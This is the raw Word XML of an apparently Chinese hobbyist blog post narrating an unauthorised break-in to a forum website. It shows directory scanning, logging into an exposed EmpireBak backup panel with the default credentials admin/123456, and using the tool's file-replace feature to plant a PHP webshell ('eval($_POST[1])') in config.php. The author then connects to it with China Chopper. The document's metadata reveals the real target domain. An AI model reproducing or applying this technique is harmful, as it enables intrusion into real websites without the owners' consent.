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D41" w:rsidRPr="00CF7D41" w:rsidRDefault="00CF7D41" w:rsidP="00CF7D41">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="315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CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>今天没什么事做、、、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突然想到前些天经常光顾的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“xxx”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的站找不到了、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就跑到了百度那搜了下自己的用户名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xxxxxx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经过里一翻努力找到了、、、找到之后就想对其安全检查、、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目标：</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00CF7D41">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://bbs.xxx.cn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> 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先看看有没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robots.txt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看看有没有什么能利用的东西、、、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还真有呵呵</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00CF7D41">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://bbs.xxx.cn/robots.txt</w:t>
        </w:r>
      </w:hyperlink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看了下有后台地址、、猜了下他的密码没有什么结果、、郁闷死、、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恩，找了很久了也没找到什么有用的东西、、用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wwwscan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扫了下目录、、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扫了段时间还真有些东西、、其中就用</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00CF7D41">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://bbs.xxx.cn/datas/</w:t>
        </w:r>
      </w:hyperlink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是帝国备份王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(Empirebak)  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没真是第一次看到、、汗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 xml:space="preserve"> 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，没办法菜啊、、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去百度下看看有什么利用的东西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 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不一会找到了一片文章《帝国备份王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(Empirebak)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拿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webshell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》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看到心里那个兴奋啊、、呵呵、、、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好东西啊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  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把它弄过来先、、、、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——————————————————————————————————————————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准确的来说应该是帝国备份王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(Empirebak)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后台拿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webshell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。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帝国备份王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(Empirebak)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简介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EmpireBak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是一款完全免费、专门为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Mysql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大数据的备份与导入而设计的软件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,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系统采用分卷备份与导入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,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理论上可备份任何大小的数据库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.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可在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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00CF7D41">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.phome.net/ebak2008os/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> 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下载到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默认账号密码为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admin  123456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登陆后先备份一次数据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备份时可选择备份到的目录。。默认有个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safemod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当然也可以是别的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..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这里以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safemod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来说了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备份完毕后来到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管理备份目录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打包并下载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把开始备份到的数据可以先下回分析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..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当然数据库比较大的话可以省略这一步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..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因为我之前下载已经分析完毕了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备份后的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safemod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目录下所有的表都是以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PHP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保存的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..Empirebak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管理备份目录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 xml:space="preserve"> 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下有个替换</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>文件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内容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 xml:space="preserve"> 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功能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如果你不知道要替换什么内容的话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..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那最好还是下载备份文件回来看下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我是替换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config.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>php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的内容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内容为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF7D41" w:rsidRPr="00CF7D41" w:rsidRDefault="00CF7D41" w:rsidP="00CF7D41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7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;?php $b_table="a,bak_guest3Book1,bak_info17Content1,bak_info17Sort1,bak_info18Content1,bak_info1Content1,bak_info1Sort1,bak_info2Content1,bak_info2Sort1,bak_info4Content1,bak_info4Sort1,bak_info5Content1,bak_info5Sort1,bak_info6Content1,bak_info6Sort1,bak_info7Content1,bak_info7Sort1,bak_info8Content1,bak_info8Sort1,bak_page12Content1,bak_page1Content</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1,bak_page21Content1,bak_poll20Inve1,bak_poll20InveCount1,bak_poll20InveOpt1,guest16Book1,guest3Book1,htmlImage,htmlImageTmp,info10Content1,info10Sort1,info12Content1,info12Sort1,info15Content1,info15Sort1,info17Content1,info17Sort1,info18Content1,info18Sort1,info19Content1,info19Sort1,info1Content1,info1Sort1,info2Content1,info2Sort1,info4Content1,info4Sort1,info5Content1,info5Sort1,info6Content1,info6Sort1,info7Content1,info7Sort1,info8Content1,info8Sort1,operatorPower,operators,page11Content1,page12Content1,page13Content1,page14Content1,page1Content1,page21Content1,poll20Inve1,poll20InveCount1,poll20InveOpt1,poll9Inve1,poll9InveCount1,poll9InveOpt1,system"; $tb[a]=1; $tb[bak_guest3Book1]=1; $tb[bak_info17Content1]=1; $tb[bak_info17Sort1]=1; $tb[bak_info18Content1]=1; $tb[bak_info1Content1]=1; $tb[bak_info1Sort1]=1; $tb[bak_info2Content1]=1; $tb[bak_info2Sort1]=1; $tb[bak_info4Content1]=1; $tb[bak_info4Sort1]=1; $tb[bak_info5Content1]=1; $tb[bak_info5Sort1]=1; $tb[bak_info6Content1]=1; $tb[bak_info6Sort1]=1; $tb[bak_info7Content1]=1; $tb[bak_info7Sort1]=1; $tb[bak_info8Content1]=1; $tb[bak_info8Sort1]=1; $tb[bak_page12Content1]=1; $tb[bak_page1Content1]=1; $tb[bak_page21Content1]=1; $tb[bak_poll20Inve1]=1; $tb[bak_poll20InveCount1]=1; $tb[bak_poll20InveOpt1]=1; $tb[guest16Book1]=1; $tb[guest3Book1]=1; $tb[htmlImage]=1; $tb[htmlImageTmp]=1; $tb[info10Content1]=1; $tb[info10Sort1]=1; $tb[info12Content1]=1; $tb[info12Sort1]=1; $tb[info15Content1]=1; $tb[info15Sort1]=1; $tb[info17Content1]=1; $tb[info17Sort1]=1; $tb[info18Content1]=1; $tb[info18Sort1]=1; $tb[info19Content1]=1; $tb[info19Sort1]=1; $tb[info1Content1]=1; $tb[info1Sort1]=1; $tb[info2Content1]=7; $tb[info2Sort1]=1; $tb[info4Content1]=1; $tb[info4Sort1]=1; $tb[info5Content1]=1; $tb[info5Sort1]=1; $tb[info6Content1]=1; $tb[info6Sort1]=1; $tb[info7Content1]=1; $tb[info7Sort1]=1; $tb[info8Content1]=1; $tb[info8Sort1]=1; $tb[operatorPower]=1; $tb[operators]=1; $tb[page11Content1]=1; $tb[page12Content1]=1; $tb[page13Content1]=1; $tb[page14Content1]=1; $tb[page1Content1]=1; $tb[page21Content1]=1; $tb[poll20Inve1]=1; $tb[poll20InveCount1]=1; $tb[poll20InveOpt1]=1; $tb[poll9Inve1]=1; $tb[poll9InveCount1]=1; $tb[poll9InveOpt1]=1; $tb[system]=1; $b_baktype=0; $b_filesize=300; $b_bakline=500; $b_autoauf=1; $b_dbname="s422857db0"; $b_stru=1; $b_strufour=0; $b_dbchar="auto"; $b_beover=0; $b_insertf="replace"; $b_autofield=",,"; ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF7D41" w:rsidRPr="00CF7D41" w:rsidRDefault="00CF7D41" w:rsidP="00CF7D41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7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>复制代码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然后替换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CF7D41" w:rsidRPr="00CF7D41" w:rsidRDefault="00CF7D41" w:rsidP="00CF7D41">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="6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7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;?php eval($_POST[1]);?&gt;by huang~~~~~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF6E36" w:rsidRDefault="00CF7D41" w:rsidP="00CF7D41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>复制代码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访问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http://www.xxx.com/upload/bdata/safemod/config.php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能看到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 xml:space="preserve"> by huang~~~~~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lastRenderedPageBreak/>
        <w:t>证明成功得到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shell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密码为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1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前提是要有管理密码能进入管理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^_^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————————————————————————————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默认密码是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admin    123456   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带着侥幸的心情试试、、、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我的天啊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 xml:space="preserve"> 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真的进来了啊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     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这绝对是长相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+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人品啊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  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呵呵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呵呵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 xml:space="preserve"> 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在后台替换成功了、、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9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00CF7D41">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://bbs.xxxxt.cn/datas//bdata/safemod/config.php</w:t>
        </w:r>
      </w:hyperlink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密码是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CF7D41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>菜刀连上、、、嘻嘻、、</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BF6E36" w:rsidSect="00BF6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558B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9774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B929CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC86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24D3"/>
    <w:rsid w:val="004824D3"/>
    <w:rsid w:val="00BF6E36"/>
    <w:rsid w:val="00CF7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E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CF7D41"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF7D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7D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ome.net/ebak2008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bs.mjkent.cn/dat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bs.mjkent.cn/robots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bs.mjkent.c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bs.mjkent.cn/datas/bdata/safemod/config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2011-10-28T06:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-10-28T06:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>